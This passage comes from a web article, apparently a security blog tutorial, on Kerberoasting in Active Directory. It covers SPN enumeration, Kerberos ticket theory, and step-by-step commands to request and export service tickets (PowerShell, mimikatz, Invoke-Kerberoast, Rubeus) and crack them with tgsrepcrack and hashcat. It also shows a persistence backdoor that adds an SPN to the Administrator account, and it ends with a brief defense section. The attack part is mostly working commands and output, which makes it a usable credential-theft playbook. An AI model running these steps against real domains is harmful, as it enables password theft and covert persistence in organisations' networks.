ldap\u002FDC1.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002Ftest.com\u003Cbr>CN=krbtgt,CN=Users,DC=test,DC=com\u003Cbr>        kadmin\u002Fchangepw\u003Cbr>CN=COMPUTER01,CN=Computers,DC=test,DC=com\u003Cbr>        RestrictedKrbHost\u002FCOMPUTER01\u003Cbr>        HOST\u002FCOMPUTER01\u003Cbr>        RestrictedKrbHost\u002FCOMPUTER01.test.com\u003Cbr>        HOST\u002FCOMPUTER01.test.com\u003Cbr>CN=MSSQL Service Admin,CN=Users,DC=test,DC=com\u003Cbr>        MSSQLSvc\u002FDC1.test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Each line starting with CN represents an account, and the information below it is the SPN associated with that account.\u003C\u002Fp>\u003Cp>For the output data above, the machine accounts (Computers) are:\u003C\u002Fp>\u003Cul>\u003Cli>CN=DC1,OU=Domain Controllers,DC=test,DC=com\u003C\u002Fli>\u003Cli>CN=COMPUTER01,CN=Computers,DC=test,DC=com\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Domain user accounts (Users) are:\u003C\u002Fp>\u003Cul>\u003Cli>CN=krbtgt,CN=Users,DC=test,DC=com\u003C\u002Fli>\u003Cli>CN=MSSQL Service Admin,CN=Users,DC=test,DC=com\u003C\u002Fli>\u003C\u002Ful>\u003Cp>There are two SPNs registered under the domain user account (Users): kadmin\u002Fchangepw and MSSQLSvc\u002FDC1.test.com\u003C\u002Fp>\u003Ch2>0x03 Principle of Kerberoasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>1. Kerberos Authentication Process\u003C\u002Fh4>\u003Cp>A simple Kerberos authentication process is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017971261_0_faf2f968e3-1.jpeg\">\u003C\u002Fp>\u003Col>\u003Cli>as_request\u003C\u002Fli>\u003Cli>as_reply\u003C\u002Fli>\u003Cli>tgs_request\u003C\u002Fli>\u003Cli>tgs_reply\u003C\u002Fli>\u003Cli>ap_request\u003C\u002Fli>\u003Cli>ap_reply\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For 4.tgs_reply, the user will receive a TGS (service ticket) encrypted with the NTLM hash of the target service instance, using the RC4-HMAC encryption algorithm.\u003C\u002Fp>\u003Cp>From an exploitation perspective, after obtaining this TGS, we can attempt to brute-force passwords, simulate the encryption process, generate a TGS for comparison. If the TGS matches, it indicates the password is correct, allowing us to obtain the plaintext password of the target service instance.\u003C\u002Fp>\u003Ch4>2. Windows systems obtain the mapping between services and service instance accounts through SPN queries.\u003C\u002Fh4>\u003Cp>Here is an example:\u003C\u002Fp>\u003Cp>User a wants to access resources of the MySQL service. During step 4.tgs_reply, the process is as follows:\u003C\u002Fp>\u003Cp>(1) The Domain Controller queries the SPN of the MySQL service.\u003C\u002Fp>\u003Cp>If the SPN is registered under a machine account (Computers), it will query the servicePrincipalName attribute of all machine accounts (Computers) to find the corresponding account.\u003C\u002Fp>\u003Cp>If the SPN is registered under a domain user account (Users), it will query the servicePrincipalName attribute of all domain users (Users) to find the corresponding account.\u003C\u002Fp>\u003Cp>(2) After finding the corresponding account, use the NTLM hash of that account to generate the TGS.\u003C\u002Fp>\u003Ch4>3. All hosts within the domain can query SPNs.\u003C\u002Fh4>\u003Ch4>4. Any user within the domain can request a TGS from any service within the domain.\u003C\u002Fh4>\u003Cp>In summary, any host within the domain can query SPNs, request TGSs from all services within the domain, and then perform brute-force attacks on the obtained TGSs.\u003C\u002Fp>\u003Cp>For the plaintext passwords obtained through cracking, only the passwords of domain user accounts (Users) are valuable, as machine account passwords cannot be used for remote connections.\u003C\u002Fp>\u003Cp>Therefore, an efficient exploitation approach is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Query SPNs to identify valuable SPNs, which must meet the following conditions:\u003C\u002Fli>\u003C\u002Fol>\u003Cul>\u003Cli>The SPN is registered under a domain user account (Users)\u003C\u002Fli>\u003Cli>Domain user accounts have high privileges\u003C\u002Fli>\u003C\u002Ful>\u003Col>\u003Cli>Request TGS\u003C\u002Fli>\u003Cli>Export TGS\u003C\u002Fli>\u003Cli>Brute force cracking\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x04 Kerberoasting Implementation Method One\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Obtain valuable SPNs\u003C\u002Fh3>\u003Cp>Must meet the following conditions:\u003C\u002Fp>\u003Cul>\u003Cli>The SPN is registered under a domain user account (Users)\u003C\u002Fli>\u003Cli>Domain user accounts have high privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>You can choose from the following three methods:\u003C\u002Fp>\u003Ch4>(1) Using the PowerShell Active Directory module\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The PowerShell Active Directory module must be installed in advance; domain controllers typically have it installed\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module ActiveDirectory\u003Cbr>get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For systems without the Active Directory module installed, you can import the Active Directory module using the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\Microsoft.ActiveDirectory.Management.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Microsoft.ActiveDirectory.Management.dll is generated after installing the PowerShell Active Directory module. I have extracted it and uploaded it to GitHub:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(2) Using PowerView\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Using kerberoast\u003C\u002Fh4>\u003Cp>powershell:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnidem\u002Fkerberoast\u002Fblob\u002Fmaster\u002FGetUserSPNs.ps1\u003C\u002Fp>\u003Cp>vbs:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnidem\u002Fkerberoast\u002Fblob\u002Fmaster\u002FGetUserSPNs.vbs\u003C\u002Fp>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cscript GetUserSPNs.vbs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Request TGS\u003C\u002Fh3>\u003Ch4>(1) Request specific TGS\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$SPNName = 'MSSQLSvc\u002FDC1.test.com'\u003Cbr>Add-Type -AssemblyName System.IdentityModel\u003Cbr>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Request all TGS\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-Type -AssemblyName System.IdentityModel\u003Cbr>setspn.exe -q *\u002F* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, enter klist to view tickets in memory, where the obtained TGS can be found\u003C\u002Fp>\u003Ch3>3. Export\u003C\u002Fh3>\u003Cp>Using mimikatz\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>kerberos::list \u002Fexport\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Crack\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnidem\u002Fkerberoast\u002Fblob\u002Fmaster\u002Ftgsrepcrack.py\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Ftgsrepcrack.py wordlist.txt test.kirbi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Kerberoasting Implementation Method Two\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Automated implementation without requiring mimikatz, works with standard user privileges. Reference: \u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Fpowershell\u002Fkerberoasting-without-mimikatz\u002F\u003C\u002Fp>\u003Cp>Code repository: \u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FEmpireProject\u002FEmpire\u002Fcommit\u002F6ee7e036607a62b0192daed46d3711afc65c3921\u003C\u002Fp>\u003Cp>Uses System.IdentityModel.Tokens.KerberosRequestorSecurityToken to request TGS, extracts TGS from the returned results. The output TGS can be cracked using John the Ripper or Hashcat.\u003C\u002Fp>\u003Cp>Example demonstration: \u003C\u002Fp>\u003Cp>Execute on a domain host with standard user privileges: \u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>-AdminCount selects high-privilege users\u003C\u002Fp>\u003Cp>Output result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017978708_1_19008d292a-1.jpeg\">\u003C\u002Fp>\u003Cp>Parameter to extract only the hash is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output result is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017987125_2_5e1a89dc02-1.jpeg\">\u003C\u002Fp>\u003Cp>The parameters for cracking with hashcat are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 13100 \u002Ftmp\u002Fhash.txt \u002Ftmp\u002Fpassword.list -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The cracking result is shown in the following figure, successfully obtaining the plaintext password MySQLAdmin111!\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017992268_3_93f75387e0-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Rubeus can also achieve the functionality of Invoke-Kerberoast, with the address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FRubeus\u003C\u002Fp>\u003Cp>The parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe kerberoast\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x06 Backdoor Exploitation of Kerberoasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After obtaining the permission to modify SPN, we can add an SPN for a specified domain user, allowing us to obtain the TGS for that domain user at any time, and after cracking, obtain the plaintext password\u003C\u002Fp>\u003Cp>For example, to add SPN VNC\u002FDC1.test.com for the domain user Administrator, the parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -U -A VNC\u002FDC1.test.com Administrator\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017996207_4_2be4223833-1.jpeg\">\u003C\u002Fp>\u003Cp>This SPN can be obtained from any host within the domain, and Kerberoast can be used to obtain the TGS, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017999097_5_c68e5993b4-1.jpeg\">\u003C\u002Fp>\u003Cp>Then use hashcat to crack it\u003C\u002Fp>\u003Cp>\u003Cstrong>Additional note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The parameters to delete the SPN are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -D VNC\u002FDC1.test.com Administrator\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x07 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a defensive perspective, it is impossible to prevent kerberoasting, but for SPNs with high attack value (registered under domain user accounts with high privileges), increasing password length can enhance cracking difficulty, and regularly changing the associated domain user passwords is recommended.\u003C\u002Fp>\u003Cp>Administrators can use Invoke-Kerberoast on a host within the domain to check for dangerous SPNs.\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>Parameters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article provides a detailed introduction to the principles, methods, and defenses of Kerberoasting, along with practical demonstrations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",998,"Onedaysec",6,"published","2026-02-02T07:51:00.061Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Kerberoasting Domain Penetration: Techniques, Exploits & Defense","Kerberoasting, domain penetration, SPN, Active Directory, security, backdoor, defense, LDAP, Kerberos",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46,47],567,566,565,564,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.702Z","2026-07-23T16:01:45.187Z","draft","2026-07-23T16:13:25.282Z"]